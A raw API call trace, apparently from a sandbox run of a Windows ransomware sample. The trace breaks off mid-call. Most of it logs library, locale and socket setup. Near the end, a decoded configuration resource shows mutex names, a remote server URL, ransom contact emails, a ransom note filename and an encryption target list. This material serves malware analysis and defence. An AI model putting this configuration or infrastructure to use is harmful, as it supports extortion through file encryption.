WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0116.453] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x13e288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0116.453] GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0116.453] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0116.453] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0116.453] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 [0116.453] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0116.453] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x13f82bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0116.454] GetProcAddress (hModule=0x76750000, lpProcName="CoReleaseServerProcess") returned 0x767b4314 [0116.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0116.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x13f82bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0116.454] GetProcAddress (hModule=0x76750000, lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0116.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0116.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0116.454] GetProcAddress (hModule=0x76750000, lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0116.454] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0116.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0116.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x13ff48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0116.454] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0116.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0116.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0116.454] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0116.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0116.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x13ff48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0116.454] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0116.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0116.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x13ff48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0116.454] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0116.454] GetThreadLocale () returned 0x409 [0116.455] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0116.455] GetCurrentThreadId () returned 0xdf8 [0116.455] GetCurrentThreadId () returned 0xdf8 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0116.455] GetThreadLocale () returned 0x409 [0116.455] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0116.455] GetThreadLocale () returned 0x409 [0116.455] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0116.455] GetCurrentThreadId () returned 0xdf8 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thursday") returned 9 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jan") returned 4 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 8 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jun") returned 4 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="June") returned 5 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Sep") returned 4 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0116.456] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 0x77383c5f [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 0x77384582 [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="getpeername") returned 0x77387147 [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="listen") returned 0x7738b001 [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="recv") returned 0x77386b0e [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="select") returned 0x77386989 [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="getservbyname") returned 0x77396ef3 [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0116.459] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0116.465] GetACP () returned 0x4e4 [0116.465] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0116.465] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe")) returned 0x30 [0116.465] GetTickCount () returned 0x279ff [0116.465] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: lpPerformanceCount=0x12fc38*=17325425520) returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x51\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x50\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x79\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4b\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x69\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6e\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x76\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x48\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x53\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x72\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x35\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x47\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x70\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x39\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x49\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x32\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0116.466] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0116.466] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0116.466] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0116.466] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0116.466] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0116.466] SizeofResource (hModule=0x400000, hResInfo=0x51c308) returned 0xef [0116.466] LockResource (hResData=0x50d55c) returned 0x50d55c [0116.466] FreeResource (hResData=0x50d55c) returned 0 [0116.466] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0116.466] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0116.466] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0116.466] LockResource (hResData=0x50d64c) returned 0x50d64c [0116.466] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0116.466] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1414f60, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0116.466] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1414f60, cbMultiByte=38, lpWideCharStr=0x140de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0116.466] FreeResource (hResData=0x50d64c) returned 0 [0116.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0116.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1414f64, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0116.466] GetCurrentThreadId () returned 0xdf8 [0116.466] GetCurrentThreadId () returned 0xdf8 [0116.466] GetCurrentThreadId () returned 0xdf8 [0116.466] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ccd18, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0116.466] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ccd18, cbMultiByte=239, lpWideCharStr=0x13d2e7c, cchWideChar=239 | out: lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0116.466] GetCurrentThreadId () returned 0xdf8 [0116.466] GetCurrentThreadId () returned 0xdf8 [0116.467] GetCurrentThreadId () returned 0xdf8 [0116.467] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0116.467] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x13c399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0116.467] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x13c399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 0x24 [0116.467] SHGetSpecialFolderPathW (in: 